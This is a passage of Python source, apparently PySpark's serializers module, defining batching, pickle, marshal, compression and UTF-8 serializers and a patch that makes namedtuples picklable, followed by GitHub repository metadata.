# NOTE: changed from pa.Columns.to_pandas, timezone issue in conversion fixed in 0.7.1
pdf = _check_dataframe_localize_timestamps(batch.to_pandas(), self._timezone)
yield [c for _, c in pdf.iteritems()]
def __repr__(self):
return "ArrowStreamPandasSerializer"
class BatchedSerializer(Serializer):
"""
Serializes a stream of objects in batches by calling its wrapped
Serializer with streams of objects.
"""
UNLIMITED_BATCH_SIZE = -1
UNKNOWN_BATCH_SIZE = 0
def __init__(self, serializer, batchSize=UNLIMITED_BATCH_SIZE):
self.serializer = serializer
self.batchSize = batchSize
def _batched(self, iterator):
if self.batchSize == self.UNLIMITED_BATCH_SIZE:
yield list(iterator)
elif hasattr(iterator, "__len__") and hasattr(iterator, "__getslice__"):
n = len(iterator)
for i in xrange(0, n, self.batchSize):
yield iterator[i: i + self.batchSize]
else:
items = []
count = 0
for item in iterator:
items.append(item)
count += 1
if count == self.batchSize:
yield items
items = []
count = 0
if items:
yield items
def dump_stream(self, iterator, stream):
self.serializer.dump_stream(self._batched(iterator), stream)
def load_stream(self, stream):
return chain.from_iterable(self._load_stream_without_unbatching(stream))
def _load_stream_without_unbatching(self, stream):
return self.serializer.load_stream(stream)
def __repr__(self):
return "BatchedSerializer(%s, %d)" % (str(self.serializer), self.batchSize)
class FlattenedValuesSerializer(BatchedSerializer):
"""
Serializes a stream of list of pairs, split the list of values
which contain more than a certain number of objects to make them
have similar sizes.
"""
def __init__(self, serializer, batchSize=10):
BatchedSerializer.__init__(self, serializer, batchSize)
def _batched(self, iterator):
n = self.batchSize
for key, values in iterator:
for i in range(0, len(values), n):
yield key, values[i:i + n]
def load_stream(self, stream):
return self.serializer.load_stream(stream)
def __repr__(self):
return "FlattenedValuesSerializer(%s, %d)" % (self.serializer, self.batchSize)
class AutoBatchedSerializer(BatchedSerializer):
"""
Choose the size of batch automatically based on the size of object
"""
def __init__(self, serializer, bestSize=1 << 16):
BatchedSerializer.__init__(self, serializer, self.UNKNOWN_BATCH_SIZE)
self.bestSize = bestSize
def dump_stream(self, iterator, stream):
batch, best = 1, self.bestSize
iterator = iter(iterator)
while True:
vs = list(itertools.islice(iterator, batch))
if not vs:
break
bytes = self.serializer.dumps(vs)
write_int(len(bytes), stream)
stream.write(bytes)
size = len(bytes)
if size < best:
batch *= 2
elif size > best * 10 and batch > 1:
batch //= 2
def __repr__(self):
return "AutoBatchedSerializer(%s)" % self.serializer
class CartesianDeserializer(Serializer):
"""
Deserializes the JavaRDD cartesian() of two PythonRDDs.
Due to pyspark batching we cannot simply use the result of the Java RDD cartesian,
we additionally need to do the cartesian within each pair of batches.
"""
def __init__(self, key_ser, val_ser):
self.key_ser = key_ser
self.val_ser = val_ser
def _load_stream_without_unbatching(self, stream):
key_batch_stream = self.key_ser._load_stream_without_unbatching(stream)
val_batch_stream = self.val_ser._load_stream_without_unbatching(stream)
for (key_batch, val_batch) in zip(key_batch_stream, val_batch_stream):
# for correctness with repeated cartesian/zip this must be returned as one batch
yield product(key_batch, val_batch)
def load_stream(self, stream):
return chain.from_iterable(self._load_stream_without_unbatching(stream))
def __repr__(self):
return "CartesianDeserializer(%s, %s)" % \
(str(self.key_ser), str(self.val_ser))
class PairDeserializer(Serializer):
"""
Deserializes the JavaRDD zip() of two PythonRDDs.
Due to pyspark batching we cannot simply use the result of the Java RDD zip,
we additionally need to do the zip within each pair of batches.
"""
def __init__(self, key_ser, val_ser):
self.key_ser = key_ser
self.val_ser = val_ser
def _load_stream_without_unbatching(self, stream):
key_batch_stream = self.key_ser._load_stream_without_unbatching(stream)
val_batch_stream = self.val_ser._load_stream_without_unbatching(stream)
for (key_batch, val_batch) in zip(key_batch_stream, val_batch_stream):
# For double-zipped RDDs, the batches can be iterators from other PairDeserializer,
# instead of lists. We need to convert them to lists if needed.
key_batch = key_batch if hasattr(key_batch, '__len__') else list(key_batch)
val_batch = val_batch if hasattr(val_batch, '__len__') else list(val_batch)
if len(key_batch) != len(val_batch):
raise ValueError("Can not deserialize PairRDD with different number of items"
" in batches: (%d, %d)" % (len(key_batch), len(val_batch)))
# for correctness with repeated cartesian/zip this must be returned as one batch
yield zip(key_batch, val_batch)
def load_stream(self, stream):
return chain.from_iterable(self._load_stream_without_unbatching(stream))
def __repr__(self):
return "PairDeserializer(%s, %s)" % (str(self.key_ser), str(self.val_ser))
class NoOpSerializer(FramedSerializer):
def loads(self, obj):
return obj
def dumps(self, obj):
return obj
# Hook namedtuple, make it picklable
__cls = {}
def _restore(name, fields, value):
""" Restore an object of namedtuple"""
k = (name, fields)
cls = __cls.get(k)
if cls is None:
cls = collections.namedtuple(name, fields)
__cls[k] = cls
return cls(*value)
def _hack_namedtuple(cls):
""" Make class generated by namedtuple picklable """
name = cls.__name__
fields = cls._fields
def __reduce__(self):
return (_restore, (name, fields, tuple(self)))
cls.__reduce__ = __reduce__
cls._is_namedtuple_ = True
return cls
def _hijack_namedtuple():
""" Hack namedtuple() to make it picklable """
# hijack only one time
if hasattr(collections.namedtuple, "__hijack"):
return
global _old_namedtuple # or it will put in closure
global _old_namedtuple_kwdefaults # or it will put in closure too
def _copy_func(f):
return types.FunctionType(f.__code__, f.__globals__, f.__name__,
f.__defaults__, f.__closure__)
def _kwdefaults(f):
# __kwdefaults__ contains the default values of keyword-only arguments which are
# introduced from Python 3. The possible cases for __kwdefaults__ in namedtuple
# are as below:
#
# - Does not exist in Python 2.
# - Returns None in <= Python 3.5.x.
# - Returns a dictionary containing the default values to the keys from Python 3.6.x
# (See https://bugs.python.org/issue25628).
kargs = getattr(f, "__kwdefaults__", None)
if kargs is None:
return {}
else:
return kargs
_old_namedtuple = _copy_func(collections.namedtuple)
_old_namedtuple_kwdefaults = _kwdefaults(collections.namedtuple)
def namedtuple(*args, **kwargs):
for k, v in _old_namedtuple_kwdefaults.items():
kwargs[k] = kwargs.get(k, v)
cls = _old_namedtuple(*args, **kwargs)
return _hack_namedtuple(cls)
# replace namedtuple with new one
collections.namedtuple.__globals__["_old_namedtuple_kwdefaults"] = _old_namedtuple_kwdefaults
collections.namedtuple.__globals__["_old_namedtuple"] = _old_namedtuple
collections.namedtuple.__globals__["_hack_namedtuple"] = _hack_namedtuple
collections.namedtuple.__code__ = namedtuple.__code__
collections.namedtuple.__hijack = 1
# hack the cls already generated by namedtuple
# those created in other module can be pickled as normal,
# so only hack those in __main__ module
for n, o in sys.modules["__main__"].__dict__.items():
if (type(o) is type and o.__base__ is tuple
and hasattr(o, "_fields")
and "__reduce__" not in o.__dict__):
_hack_namedtuple(o) # hack inplace
_hijack_namedtuple()
class PickleSerializer(FramedSerializer):
"""
Serializes objects using Python's pickle serializer:
http://docs.python.org/2/library/pickle.html
This serializer supports nearly any Python object, but may
not be as fast as more specialized serializers.
"""
def dumps(self, obj):
return pickle.dumps(obj, protocol)
if sys.version >= '3':
def loads(self, obj, encoding="bytes"):
return pickle.loads(obj, encoding=encoding)
else:
def loads(self, obj, encoding=None):
return pickle.loads(obj)
class CloudPickleSerializer(PickleSerializer):
def dumps(self, obj):
return cloudpickle.dumps(obj, 2)
class MarshalSerializer(FramedSerializer):
"""
Serializes objects using Python's Marshal serializer:
http://docs.python.org/2/library/marshal.html
This serializer is faster than PickleSerializer but supports fewer datatypes.
"""
def dumps(self, obj):
return marshal.dumps(obj)
def loads(self, obj):
return marshal.loads(obj)
class AutoSerializer(FramedSerializer):
"""
Choose marshal or pickle as serialization protocol automatically
"""
def __init__(self):
FramedSerializer.__init__(self)
self._type = None
def dumps(self, obj):
if self._type is not None:
return b'P' + pickle.dumps(obj, -1)
try:
return b'M' + marshal.dumps(obj)
except Exception:
self._type = b'P'
return b'P' + pickle.dumps(obj, -1)
def loads(self, obj):
_type = obj[0]
if _type == b'M':
return marshal.loads(obj[1:])
elif _type == b'P':
return pickle.loads(obj[1:])
else:
raise ValueError("invalid sevialization type: %s" % _type)
class CompressedSerializer(FramedSerializer):
"""
Compress the serialized data
"""
def __init__(self, serializer):
FramedSerializer.__init__(self)
assert isinstance(serializer, FramedSerializer), "serializer must be a FramedSerializer"
self.serializer = serializer
def dumps(self, obj):
return zlib.compress(self.serializer.dumps(obj), 1)
def loads(self, obj):
return self.serializer.loads(zlib.decompress(obj))
def __repr__(self):
return "CompressedSerializer(%s)" % self.serializer
class UTF8Deserializer(Serializer):
"""
Deserializes streams written by String.getBytes.
"""
def __init__(self, use_unicode=True):
self.use_unicode = use_unicode
def loads(self, stream):
length = read_int(stream)
if length == SpecialLengths.END_OF_DATA_SECTION:
raise EOFError
elif length == SpecialLengths.NULL:
return None
s = stream.read(length)
return s.decode("utf-8") if self.use_unicode else s
def load_stream(self, stream):
try:
while True:
yield self.loads(stream)
except struct.error:
return
except EOFError:
return
def __repr__(self):
return "UTF8Deserializer(%s)" % self.use_unicode
def read_long(stream):
length = stream.read(8)
if not length:
raise EOFError
return struct.unpack("!q", length)[0]
def write_long(value, stream):
stream.write(struct.pack("!q", value))
def pack_long(value):
return struct.pack("!q", value)
def read_int(stream):
length = stream.read(4)
if not length:
raise EOFError
return struct.unpack("!i", length)[0]
def write_int(value, stream):
stream.write(struct.pack("!i", value))
def write_with_length(obj, stream):
write_int(len(obj), stream)
stream.write(obj)
if __name__ == '__main__':
import doctest
(failure_count, test_count) = doctest.testmod()
if failure_count:
exit(-1)
| {
"content_hash": "8aaadd9f398c37858e442ea6f4cd2796",
"timestamp": "",
"source": "github",
"line_count": 691,
"max_line_length": 100,
"avg_line_length": 31.781476121562953,
"alnum_prop": 0.6202358726833933,
"repo_name": "ericvandenbergfb/spark",
"id": "37e7cf3fa662eb4cdca85a7130f4c1a3a4f1d5c5",
"size": "22746",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "python/pyspark/serializers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "33781"
},
{
"name": "Batchfile",
"bytes": "30285"
},
{
"name": "C",
"bytes": "1493"
},
{
"name": "CSS",
"bytes": "23957"
},
{
"name": "HTML",
"bytes": "10056"
},
{
"name": "Java",
"bytes": "3142003"
},
{
"name": "JavaScript",
"bytes": "141585"
},
{
"name": "Makefile",
"bytes": "7774"
},
{
"name": "PLpgSQL",
"bytes": "8788"
},
{
"name": "PowerShell",
"bytes": "3756"
},
{
"name": "Python",
"bytes": "2434056"
},
{
"name": "R",
"bytes": "1089584"
},
{
"name": "Roff",
"bytes": "14714"
},
{
"name": "SQLPL",
"bytes": "6233"
},
{
"name": "Scala",
"bytes": "24449859"
},
{
"name": "Shell",
"bytes": "158388"
},
{
"name": "Thrift",
"bytes": "33605"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.